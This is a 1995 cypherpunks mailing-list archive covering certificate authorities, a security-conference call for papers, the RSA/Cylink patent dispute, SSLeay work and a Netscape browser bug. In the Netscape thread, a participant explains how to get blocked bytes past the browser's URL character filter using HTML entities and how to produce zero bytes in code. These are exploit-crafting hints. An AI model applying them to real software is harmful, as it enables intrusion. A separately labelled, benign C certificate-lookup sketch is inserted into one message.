Content-Type: text/plain


At 10:40 AM 9/25/95 -0700, sameer <sameer@c2.org> wrote:
>	The really big sticking point I see, however, is the
>certification authorities. There is a single point of failure here and
>that is at Verisign. This becomes a large problem I think if the
>encrypted email that Netscape does requires personal x509 certificates (I
>read that Verisign is issuing those for $9/each.) This is a problem
>because for one thing I don't think Verisign will want to issue certs
>to pseudonyms, and Netscape may not talk encrypted email to
>non-certified people. (I am not sure)

Verisign has a range of certificate types; a "Type I", which only
promises that the userid is unique and is otherwise unverified,
is free for non-commercial users and something like $6 for commercial;
Types II and III require various levels of documentation and $$ to get.
The www.verisign.com home page didn't exactly say how to get one;
I gather the answer is "wait for October" or "Use the next Netscape
version", where I don't remember if that's 1.2.2 or 2.0.

Netscape is being modified to accept non-Verisign CAs, which means
we _can_ build a web of trust to take advantage of it, using
X.509 certs or a hybrid of X.509 and PGP.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:37:23 PDT
To: cypherpunks@toad.com
Subject: Re: Prvasoft FAX Encryption Software
Message-ID: <199509281737.KAA15710@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


After the recent discussions of the Privasoft Fax Software
and its proprietors' dislike of the Cryptographers' Inquisition :-),
I wrote the author a neutral note discussing what I'm trying
to accomplish for one of my customers, and asked about evaluation copies.
He's put it on the Web at www.megasoft.com/privasoft/ ;
it's "not crippleware", just limited number of uses.
So anybody who wants to do some research into proprietary patented
trade-secret products [_I_ didn't say Snake Oil in this posting :-)],
there it is.  His description of it sounds like it's got a
reasonably friendly GUI, though I'm not sure that rates $130
when you can get fax software free with modems or really
high-quality OCR-equipped fax software for less than that...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 28 Sep 95 10:39:53 PDT
To: cypherpunks@toad.com
Subject: FSTC - What is it...
Message-ID: <v0211010fac9088834ecd@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


In answer to your question:

I am not the official spokesperson for the organization. In fact I serve on
a working group in an advisory and design review capacity. However I can
tell you that:

The Financial Services Technology Consortium (FSTC) is a
consortium of financial services providers, national laboratories,
universities, and government agencies who sponsor and participate in
non-competitive collaborative research and development on interbank
technical projects.

The home page is located at

     http://www.llnl.gov/fstc

and although still under construction offers pointers to a number of our
projects like e-check and electronic-payment-handler as well as
fraud-prevention tools and technologies. As to the actual posting of the
website I just finished this yesterday so it will be listed pretty much in
all the "cool places".

a good point of contact for FSTC is: Dan.Schutzer@citicorp.com (Dan, please
forgive me for giving the world your name!)

I personally see FSTC as the strongest player in the secure e-commerce
effort and would advise any banking and other financial services players
(including the bond and stock houses) to get onto their bandwagon,
yesterday...

This leads me to believe that because of their Federal
Involvement/Sponsorship, that they will indeed become *the* de facto
standards organization.

As to the meetings planned they are scheduled for the
-----------------------------------------------------
10-Oct-95       E-Payment Working Group - Security Services, Cambridge Mass.

11-Oct-95       W3C meeting , Cambridge Mass.

26-Oct-95       E-Payment Working Group , General Meeting, Teaneck, NJ.


Hope this answers your questions...

Sincerely,
Todd Glassey
E-Payment Working Group
Chief Technologist
Looking Glass Technologies
todd@lgt.com


>This reached me via a couple of lists, so I hope I'm replying to the
>right person:
>
>
>>FYI-  the FSTC E-payment Working Group meeting is happening at the W3 meeting
>>on the day before the meeting itself. The meeting is being held at the OSF
>>facilities.
>
>Did you send this note? Can you tell me a bit more about this --
>what's FSTC?
>
>Thanks!
>
>--Michael Smith
>  smithmi@dev.prodigy.com
>
>  Support the Zimmerman legal defense! http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 28 Sep 95 07:53:17 PDT
To: cypherpunks@toad.com
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
Message-ID: <v02120d00ac906737c792@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: zurko@osf.org (Mary Ellen Zurko)
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
To: www-buyinfo@allegra.att.com
Date: Thu, 28 Sep 95 9:59:45 EDT
Cc: zurko@osf.org (Mez)
Mailer: Elm [revision: 70.85]

                           CALL FOR PAPERS

1996 IEEE Symposium on                              May 6-8, 1996
Security and Privacy                            Oakland, California

                             sponsored by
  IEEE Computer Society Technical Committee on Security and Privacy
                         in cooperation with
    The International Association for Cryptologic Research (IACR)

Since 1980, the Symposium on Security and Privacy has been the premier
forum for presenting developments in computer security and for
bringing together researchers and practitioners in the field.

This year, we seek to build upon this tradition of excellence by
re-emphasizing work on engineering and applications as well as
theoretical advances.  We also seek to broaden the scope of the
Symposium by introducing additional topics.  We want to hear not only
about new theoretical results, but also about work in the design and
implementation of secure systems and work on policy relating to system
security.  We are particularly interested in papers on policy and
technical issues relating to privacy in the context of the Information
Infrastructure, papers on securing unsecure applications and operating
systems, papers that relate software and system engineering technology
to the design of secure systems, and papers on hardware and
architectural support for secure systems.

The symposium will focus on technical aspects of security and privacy
as they arise in commercial and industrial applications, as well as in
government and military systems.  It will address advances in the
theory, design, implementation, analysis, and application of secure
computer systems, and in the integration and reconciliation of
security and privacy with other critical system properties such as
reliability, performance, and safety.  Topics in which papers and
panel session proposals are invited include, but are not limited to,
the following:


Secure systems          Privacy Issues          Access controls
Security verification   Network security        Policy modeling
Information flow        Authentication          Database security
Data integrity          Security Protocols      Viruses and worms
Auditing                Biometrics              Smartcards
Commercial and industrial security              Intrusion Detection
Security and other critical system properties   Distributed systems security
Novel applications of cryptography and other security techniques

We will continue the session of very brief (5-minute) talks introduced
last year.  Our goal is to make it possible for us to hear from people
who are advancing the field in the areas of system design and
implementation, and who would like to present their ideas to the
symposium audience but may lack the time and resources needed to
prepare a full paper.  Submissions for this session will be accepted
up to April 2, 1996 to permit us to hear of the most recent
developments. Abstracts of these talks will be distributed at the
conference.

INSTRUCTIONS TO AUTHORS:

Send six copies of your paper and/or proposal for a panel session to
John McHugh, Program Co-Chair, at the address given below.  Papers and
panel proposals must be received by November 6, 1995.  Papers, which
should include an abstract, must not exceed 7500 words.  The names and
affiliations of the authors should appear on a separate cover page
only, as a ``blind'' refereeing process is used.  In addition to the
paper submission, an ASCII copy of the paper title and abstract should
be sent to the Program Co-Chair (mchugh@cs.pdx.edu) by electronic mail.
These will be distributed electronically (without author
identification) to the entire program committee to aid in the
appropriate assignment of referees. Authors must certify prior to
December 25, 1995 that any and all necessary clearances for
publication have been obtained.

Papers must report original work that has not been published
previously, and is not under consideration for publication elsewhere.
Abstracts, overlength papers, electronic submissions, late
submissions, and papers that cannot be published in the proceedings
will be rejected without review.  Authors will be notified of
acceptance by January 16, 1996.  Camera-ready copies are due not later
than March 4, 1996.

Panel proposals should describe, in two pages or less, the objective
of the panel and the topic(s) to be addressed.  Names and addresses of
potential panelists (with position abstracts if possible) and of
the moderator should also be included.  Panels are not intended to
serve as alternate paper sessions and it is expected that, with the
possible exception of an overview of the topic area by the panel
chair, individual presentations by panel members will be limited to
five to ten minutes and that at least one third of the session will be
reserved for discussion.

Submitters of abstracts for the special session of five-minute talks
should submit one page abstracts to John McHugh, Program Co-Chair, at
the address given below.  The abstract should be one page or less;
Email submissions of 30 to 60 lines are preferred. Abstracts must be
received by April 2, 1996.  Authors will be notified of acceptance or
rejection of abstracts by April 16.  Submitted abstracts that are
accepted will be distributed at the conference.  Presenters of
five-minute talks are expected to register for the conference.
Overtly commercial presentations are inappropriate.

The Symposium will also include informal poster sessions where
preliminary or speculative material, and descriptions or
demonstrations of software, may be presented.  Send one copy of your
poster session paper to Dale Johnson, at the address given below, by
January 31, 1996, together with certification that any and all
necessary clearances for presentation have been obtained.

Again this year, we will attempt to counsel prospective authors.  If
you have questions about whether or how to present your work to the
symposium, please send email to the Chair (dmj@mitre.org), and we will
do our best to assist you.

Information about this conference will also be available by
anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web
at http://www.cs.pdx.edu/SP96. The program chairs can be reached by
email at sp96@cs.pdx.edu.

PROGRAM COMMITTEE

Dave Bailey, Galaxy Computer Services, USA
Terry Vickers Benzel, TIS, USA
Lee A. Benzinger, Loral, USA
Debbie Cooper, DMCooper, USA
Oliver Costich, Independent Consultant, USA
Yves Deswarte, LAAS-CNRS & INRIA, FR
Jim Gray, Hong Kong U. of Sci. and Tech, HK
Li Gong, SRI, USA
Sushil Jajodia, GMU, USA
Paul Karger, GTE, USA
Carl Landwehr, NRL, USA
John McLean, NRL, USA
Catherine A. Meadows, NRL, USA
Rich Neely, CTA, USA
Sylvan S. Pinsky, DoD, USA
Mike Reiter, AT&T, USA
Sue Rho, TIS, USA
Peter Ryan, DRA, UK
Tom Schubert, Portland State Univ., USA
Stuart Stubblebine, AT&T, USA
Elisabeth Sullivan, Sequent, USA
Tom Van Vleck, Taligent, USA
Vijay Varadharajan, Univ. of Western Sydney, AU
Yacov Yacobi, Microsoft, USA
Raphael Yahalom, Hebrew University, Israel
Mary Ellen Zurko, OSF, USA


For further information concerning the symposium, contact:


  Dale Johnson, General Chair        John McHugh, Program Co-Chair
  The MITRE Corporation              Computer Science Department
  Mailstop A156                      Portland State University
  202 Burlington Rd                  P.O. Box 751
  Bedford, MA 01730-1420, USA        Portland OR 97207-0751, USA
  Tel: +1 (617) 271-8894             Tel: +1 (503) 725-5842
  Fax: +1 (617) 271-3816             Fax: +1 (503) 725-3211
  dmj@mitre.org                      mchugh@cs.pdx.edu

  Steve Kent, Vice Chair             George Dinolt, Program Co-Chair
  BBN Systems and Technologies       Loral WDL
  Mailstop 13/2a                     P.O. Box 49041, MS X20
  70 Fawcett Street                  San Jose, CA 95161-9041
  Cambridge, MA 02138                Tel: +1 (408) 473-4150
  Tel: +1 (617) 873-6328             Fax: +1 (408) 473-4272
  Fax: +1 (617) 873-4086             dinolt@wdl.loral.com
  kent@bbn.com

  Charles Payne, Treasurer
  Secure Computing Corporation
  2675 Long Lake Road
  Roseville, MN  55113
  Tel: +1 (612) 628-1594
  Fax: +1 (612) 628-2701
  cpayne@sctc.com

  Peter Ryan, European Contact       Jim Gray, Asia/Pacific Contact
  Defence Research Agency            Department of Computer Science
  Room NX17                          Hong Kong Univ. of Science & Technology
  St Andrew's Rd                     Clear Water Bay, Kowloon, Hong Kong
  Malvern                            Tel: +852 358-7012
  Worcs WR14 3PS,UK                  Fax: +852 358-1477
  Tel +44 (0684) 895845              gray@cs.ust.hk
  Fax +44 (0684) 894303
  ryan@rivers.dra.hmg.gb

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:11:07 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281510.LAA21039@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    9-28-95. W$Japer:
> 
>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet.

That's almost an invitation to hack Microsoft's web products, isn't it?

(Anyone from Netscape care to join in the fun?)

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 28 Sep 95 03:51:10 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v02120d01ac88cf556dd4@[199.2.22.120]>
Message-ID: <9509281050.AA15525@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes writes:
 > Spent too much time last night playing with the Netscape bug;
 > among other things wrote some code to throw various random binary
 > URLs at Netscape. Netscape seems prepared to swallow the bait
 > as long as the URL does _not_ contain characters screened as
 > follows:
 >  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
 > This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

No, you *can* put 0x22, 0x3e and 0x2f by using respectively
&#34; &#62; and &#47; html constructs  (&#nnn; nn decimal ascii code)
unfortunately &#0; is not recognized but you can probably use any number
subtracted by itself or even short lda#0 (depending on the cpu),...if
you need a zero,...(what for ?)

I hope this helps too, btw, anyone having contacts on the 8lgm folks?
they must have experience with that kind of stuff...

Uptodate infos kept on http://hplyot.obspm.fr/~dl/netscapesec/

It seems the anim is working on about every netscape around, except
one folk on linux that reported it didn't crash though someone else,
on linux too said it crashed...

Even if a patch should be available now, making a demonstration is
still interesting IMO [specially when you know that there are still
ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP
access packages!...]

dl

--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Qaddafi ammunition radar Legion of Doom KGB Khaddafi Croatian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Thu, 28 Sep 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Java
Message-ID: <01HVT4585WLY000R2D@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> From:	IN%"jya@pipeline.com"  "John Young" 25-SEP-1995 15:29:30.33
> To:	IN%"WOOD@VAX2.ROCKHURST.EDU"
> CC:	
> Subj:	JAV_jiv
> 
> 
>    The New York Times, September 25, 1995, pp. D1, D4.
> 
> 
> 
>    Sun is a maker of computers and software using the
>    industry-standard Unix software operating system and the
>    leading provider of so-called Internet server computers
>    that act as the gateway through which most people's desktop
>    computers actually send and receive data over the Net.
>    Figuring that what is good for the Internet is good for
>    Sun, the company now hopes to turn Java into an industry
>    standard by making it freely available to individuals and
>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>    universities, while licensing it to companies that
>    incorporate it into software products.
> 
	
Does anyone know when or where Java is available?

Many thanks,

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 28 Sep 95 08:52:03 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950928114956.15217B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



Is this the return of "Mosaic Communications" :-) 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:54:04 PDT
To: cypherpunks@toad.com
Subject: european version of EFF/EPIC/etc?
Message-ID: <199509281553.LAA21103@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I was wondering if the Eurpeans had an equivalent of EPIC or EFF
lobbying against crypto restrictions there, given the disturbing news
a week or so ago.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:59:15 PDT
To: cypherpunks@toad.com
Subject: Re: european version of EFF/EPIC/etc?
In-Reply-To: <199509281553.LAA21103@frankenstein.piermont.com>
Message-ID: <199509281559.LAA21120@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" writes:
> I was wondering if the Eurpeans had an equivalent of EPIC or EFF

I hate it when I type too fast. Obviously that isn't intended to be a
new continent!

> lobbying against crypto restrictions there, given the disturbing news
> a week or so ago.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 28 Sep 95 12:03:44 PDT
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: Q&A on the RSA/Cylink legal dispute
Message-ID: <9508288123.AA812314973@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain



        Here is RSA's Question & Answer sheet on the arbitration.
It is available on our web site, www.rsa.com.
                --Bob

______________________________ Forward Header __________________________________

              Q&A ON THE RSA/CYLINK LEGAL DISPUTE

This page contains general questions that have been brought up to us 
regarding the legal dispute between RSA and Cylink. We are providing these 
answers in hopes that you may better understand the issues.

----------------------------------------------------------------------------

                             September 25, 1995

Q. How did RSA's legal disputes with Cylink begin?

     A. It began in April of 1994 when Cylink filed an Arbitration Demand 
     seeking to have a panel rule that Cylink was entitled to a retroactive 
     patent license to RSA, also called the MIT patent. That was the extent 
     of their Arbitration Demand at that time. The dispute was precipitated 
     by RSA's discovery that Cylink had entered into a secret deal to 
     provide products incorporating the patented MIT technology - even 
     though Cylink knew it did not have a license.
                                ------------------

Q. Why didn't PKP/RSA just sell them one? Isn't that their business?

     A. We offered them one several times. They wanted to pay essentially 
     nothing for it. Although Cylink denied it, the fact that we offered 
     them a license was confirmed by the Arbitrators in their ruling.
                                ------------------

Q. Patents are routinely licensed and royalties routinely paid; why did 
Cylink go to the extraordinary length of suing RSA Data Security to obtain a 
license?

     A. We learned that in April of 1994 Cylink had won, over other bidders, 
     a very substantial business deal with SWIFT (an international banking 
     consortium) to provide X.25 encryption units for use by SWIFT on a 
     worldwide basis. SWIFT had insisted that these products use the RSA 
     patented technology for key management and authentication. Cylink had 
     represented to SWIFT in their April 1994 contract that Cylink had a 
     license to provide RSA technology. But they didn't. Cylink chose to sue 
     us to win a retroactive license rather than simply admit what they had 
     done and pay for a license. Cylink never informed us of their use of 
     RSA or the representation to SWIFT. They never paid a penny to PKP or 
     RSA for their unlicensed use of the RSA technology. They never even put 
     any royalties aside. None of these facts are in dispute and are all a 
     matter of public record.
                                ------------------

Q. How did the litigation go beyond a limited Arbitration over a license?

     A. We didn't understand it at the time, but it's obvious now. While 
     more claims and counterclaims were added to the Arbitration demand, 
     Cylink knew of their SWIFT problem and other similar problems; we 
     didn't. We believe that they were desperately trying to cover their 
     unlicensed use of RSA by trying to litigate us into submission before 
     it was discovered. It didn't work.
                                ------------------

Q. What were the additional claims by each side?

     A. Charges were made by each of RSA and Cylink that the other had breached 
     the exclusive licensing authority of PKP among other wrongful acts. 
     This brought a second set of issues for the Arbitrators. Finally, both 
     parties asked to have PKP dissolved as we obviously could not continue 
     as business partners; this was the third issue to be decided. It's 
     quite clear in the Arbitration Panel's ruling that there were only 
     three issues to be decided: (a) is Cylink entitled to a retroactive 
     license to use RSA; (b) did either party breach the Partnership 
     Agreement; and (c) should PKP be dissolved. The answers were no, no, 
     and yes.
                                ------------------

Q. If that's true, then how does Cylink claim that the Panel's ruling 
determined that RSA software customers are infringing the Stanford patents?

     A. The Arbitration Panel did not determine that the use of RSA software 
     by RSA licensees or that the practice of RSA infringes the Stanford 
     patents. It is most certainly true that the ruling was very limited; the 
     Ruling itself starts out by stating the questions. The Panel did not, 
     under any interpretation, rule on patent validity or determine that 
     anyone was infringing. Cylink's claims to the contrary, along with their 
     claims that somehow Cylink can rely on the Ruling to prove infringement 
     are simply not true and ignore many other facts.
                                ------------------

Q. What other facts?

     A. The Panel's ruling was very specific. Everything it said about third 
     parties, including RSA customers who use software, refers to their need 
     for patent licenses. If you bought software from RSA and RSA itself had 
     the rights to make that software and license it to you, you don't need 
     a separate patent license; rights to the patents came with the product. 
     The Ruling also states, "RSA has a right to license its software."
                                ------------------

Q. Under what circumstances would you need a separate patent license?

     A. If you want to make your own product -as opposed to buying one, such 
     as RSA's software- you need a patent license. If you bought a software 
     product but didn't use it, meaning you wrote your own, or re-wrote it, 
     then you may need a separate patent license to do that. We believe the 
     Panel was simply making it clear that just because you bought software 
     from RSA, that fact alone doesn't mean you are free from the need for a 
     separate patent license if you're not using the RSA software and making 
     your own. You didn't get an explicit patent license with the software, 
     you got rights under the patents as necessary to use the software. If 
     you're using RSA's software -you didn't write your own- you don't need 
     a separate patent license under either the MIT or Stanford patents.
                                ------------------

Q. Are there other relevant facts that Cylink has ignored?

     A. Perhaps the most important fact that Cylink is carefully ignoring is 
     that Cylink knows RSA did indeed have rights to make products under the 
     MIT and Stanford patents. Cylink, for over five years, knowing full 
     well what RSA sold and how, has not only referred customers to us, but 
     in some cases where the customer was being cautious, Cylink confirmed 
     to them in writing at their request that no separate patent licenses 
     were necessary if they licensed RSA software. In other words, prospects 
     of RSA's went to Cylink and said, "We're going to license this software 
     from RSA. Do we need separate patent licenses from Cylink or PKP?" 
     Cylink confirmed the answer - no. (And those companies then did in fact 
     license our software. Cylink didn't turn around and sue them.) This 
     alone should deter Cylink from bringing infringement suits against RSA 
     customers. Nothing in the Panel's ruling changes any part of these 
     facts. In fact, Cylink's acknowledgment that RSA had such rights came out 
     in the Arbitration proceeding itself. It's a matter of record. Cylink 
     would also not like anyone to be aware that a suit was filed in Federal 
     Court in 1994 to invalidate the Stanford patents, and that a ruling is 
     due in December.
                                ------------------

Q. How is RSA protecting its customers from action by Cylink?

     A. We have filed a Declaratory Relief Action in Federal Court. In that 
     action, we have essentially said that Cylink is estopped -prevented- 
     from taking action against anyone for infringing the Stanford patents 
     for several reasons. The main reason is that companies who licensed 
     software from RSA Data Security rather than "build their own" software 
     do not need separate licenses to the MIT or Stanford patents. Since 
     Cylink has confirmed this many times since 1990, they should not sue 
     anyone for infringement. Another reason is that the Stanford patents 
     are unenforceable and/or invalid. This action by RSA means that any 
     suit brought by Cylink against anyone for infringement of the Stanford 
     patents should be stopped until the resolution of the Declaratory 
     Relief action, and Cylink will have to prevail on all the points above 
     before they can assert any infringement. We have also indemnified our 
     customers against claims such as those implicitly threatened by Cylink. 
     RSA intends to stand behind these indemnity agreements fully. Anyone 
     can bring a lawsuit for just about any reason. If Cylink tries to sue 
     an RSA customer, RSA has both the determination and the resources to 
     defend any such action. Read the Cylink press release carefully. Cylink 
     huffs and puffs a lot, but is not directly threatening to sue anyone 
     -that would mean they would be forced to fight the virtually impossible 
     battle of prevailing on every point in our Declaratory Relief action- 
     but instead are saying that buying a license can eliminate any risk.
                                ------------------

Q. Has anyone else challenged the Stanford patents?

     A. A suit was filed in Federal Court last year by Roger Schlafly to 
     invalidate the Stanford patents. A ruling is due in December. From what 
     we've seen, Schlafly's claims raise disturbing questions about the 
     Stanford patents. This whole business of the Stanford patents may be 
     moot in a few months. There may be no risk - and no need to try to get 
     any money back from Cylink.
                                ------------------

Q. What will be the significance of PKP being dissolved?

     A. The most important change we see is that licenses to the MIT patent 
     will be available for the first time in over five years without Cylink 
     interference. * There is a tremendous amount of pent-up demand, and we 
     are very busy filling it. Many of the largest companies in Europe, Asia, 
     and the US are purchasing licenses to bring RSA-based products to 
     market, including many low-cost chips and smart cards. We have already 
     licensed a number of large and small companies that are bringing 
     RSA-based electronic commerce, access control, and Internet security 
     systems to market; we expect many, many more.
                                ------------------

Q. Why can't RSA and Cylink simply settle their differences?

     A. That's a good question. The fact is that RSA recognizes this 
     litigation is not beneficial to anyone and has offered to settle the 
     dispute by granting Cylink a license to the MIT patent. Cylink has 
     consistently overestimated the strength of its legal position and has 
     refused all reasonable offers. Cylink now finds itself in the 
     unenviable position of trying to sell its security products without RSA 
     technology - which is the de facto industry standard. No amount of 
     "spin doctoring" in press releases by Cylink changes that fact.
                                ------------------

* During its existence from April of 1990 until September of this year, PKP 
could not grant any license without the approval of both partners. As a 
result of PKP's dissolution, the rights to the Stanford patents were 
returned to Cylink, and the exclusive right to license the MIT patent (RSA) 
was returned to RSA Data Security, Inc. Cylink currently has no rights to 
sell any products incorporating the MIT patented technology.

---------------------------------------------------------------------------- 
(C) 1995 RSA Data Security, Inc. All rights reserved.
Permission granted for unlimited reproduction and distribution unmodified.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 28 Sep 95 00:04:50 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199509272223.PAA13812@ix7.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.950928120233.1296A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 27 Sep 1995, Bill Stewart wrote:
> 6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
> related code in SSLeay to steal to help implement it?

I am cleaning up and documenting the routines right now, but yes, it is 
possible to implement not only a CA but all the other stuff you mention.

I have finished digital envelope routines (ala Sign, Verify, Seal and Open).
I have the full functionality of RSAref plus support for about umpteen 
different ciphers in umpteen different modes (well DES, IDEA and RC4 in a 
total of 13 different modes, I use structure pointers to specify ciphers 
so only the ciphers used are linked in and it is also trivial for 
applications to specify new ciphers to use).

Everything needed to implement PEM is there, to do S/MIME I've got to do 
PKCS-7 but that is just a parsing and packaging problem which I will do 
(when I get time) for SSL v3. 

I'm also about to redo my X509_get_certificate routine so that an 
application can 'push' 'methods' onto the system used to lookup certificates.
I need to be able to look them up via an alias, subject X509 DN, and 
via Issuer and ID.  If I get time I'll probably put in a demo 'method' 
that will talk to a socket/host and ask for certificates (probably a 
simple perl server at the other end).

I'm taking the view that if I can put hooks into the library for other 
people to put in routines to retrieve certificates/CRL's I will not have 
to do all the work :-).  I just have to document everything so other 
people can have a play :-)

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
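
[Added example, not part of Eric Young's message and not SSLeay code: a sketch of the pluggable certificate-lookup idea described above, with methods pushed onto a stack and queried by alias, subject DN, or issuer and ID. All type names, function names and certificate data are hypothetical and constructed for illustration.]

```c
#include <stdio.h>
#include <string.h>
/* Hypothetical types for illustration; these are not SSLeay's structures. */
typedef struct {
    const char *alias;    /* local nickname, may be NULL */
    const char *subject;  /* subject DN */
    const char *issuer;   /* issuer DN */
    long serial;          /* ID assigned by the issuer */
} cert_t;

typedef enum { BY_ALIAS, BY_SUBJECT, BY_ISSUER_ID } query_kind_t;

typedef struct {
    query_kind_t kind;
    const char *name;     /* alias, subject DN or issuer DN, per kind */
    long serial;          /* used only with BY_ISSUER_ID */
} cert_query_t;

typedef struct lookup_method {
    const char *name;
    const cert_t *(*find)(void *ctx, const cert_query_t *q);
    void *ctx;                   /* method-private state */
    struct lookup_method *next;  /* set by push_lookup_method() */
} lookup_method_t;

static lookup_method_t *method_stack = NULL;

/* The most recently pushed method is consulted first. */
void push_lookup_method(lookup_method_t *m)
{
    m->next = method_stack;
    method_stack = m;
}

/* Does this certificate really answer the query? */
int cert_matches(const cert_t *c, const cert_query_t *q)
{
    switch (q->kind) {
    case BY_ALIAS:   return c->alias != NULL && strcmp(c->alias, q->name) == 0;
    case BY_SUBJECT: return strcmp(c->subject, q->name) == 0;
    case BY_ISSUER_ID: return strcmp(c->issuer, q->name) == 0 && c->serial == q->serial;
    }
    return 0;
}

/* Walk the stack; an answer that does not match the query is skipped. */
const cert_t *get_certificate(const cert_query_t *q, const char **found_by)
{
    lookup_method_t *m;
    *found_by = NULL;
    for (m = method_stack; m != NULL; m = m->next) {
        const cert_t *c = m->find(m->ctx, q);
        if (c != NULL && cert_matches(c, q)) {
            *found_by = m->name;
            return c;
        }
    }
    return NULL;
}

/* Method 1: search an in-memory table terminated by a NULL subject. */
const cert_t *table_find(void *ctx, const cert_query_t *q)
{
    const cert_t *c;
    for (c = (const cert_t *)ctx; c->subject != NULL; c++)
        if (cert_matches(c, q)) return c;
    return NULL;
}

/* Method 2: stand-in for a faulty remote source that ignores the query. */
const cert_t *careless_find(void *ctx, const cert_query_t *q)
{
    (void)q;
    return (const cert_t *)ctx;
}

/* Constructed sample data. */
static cert_t local_store[] = {
    { "alice", "CN=Alice, O=Example", "CN=Example CA", 17 },
    { "bob",   "CN=Bob, O=Example",   "CN=Example CA", 18 },
    { NULL, NULL, NULL, 0 }
};
static cert_t stray_cert = { "mallory", "CN=Mallory, O=Elsewhere", "CN=Other CA", 1 };
static lookup_method_t local_method  = { "local-table", table_find, local_store, NULL };
static lookup_method_t remote_method = { "remote-stub", careless_find, &stray_cert, NULL };

int main(void)
{
    cert_query_t q = { BY_ISSUER_ID, "CN=Example CA", 18 };
    const char *by;
    push_lookup_method(&local_method);
    push_lookup_method(&remote_method);  /* consulted before local-table */
    const cert_t *c = get_certificate(&q, &by);
    printf("%s via %s\n", c ? c->subject : "(none)", by ? by : "-");
    return 0;
}
```

[Finding a certificate this way says nothing about its validity; signature and CRL checks still have to follow the lookup.]
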





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Thu, 28 Sep 95 09:40:25 PDT
To: patrick@verity.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
In-Reply-To: <9509280438.AA23997@cantina.verity.com>
Message-ID: <199509281640.MAA20585@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Date: Wed, 27 Sep 1995 21:38:33 -0700
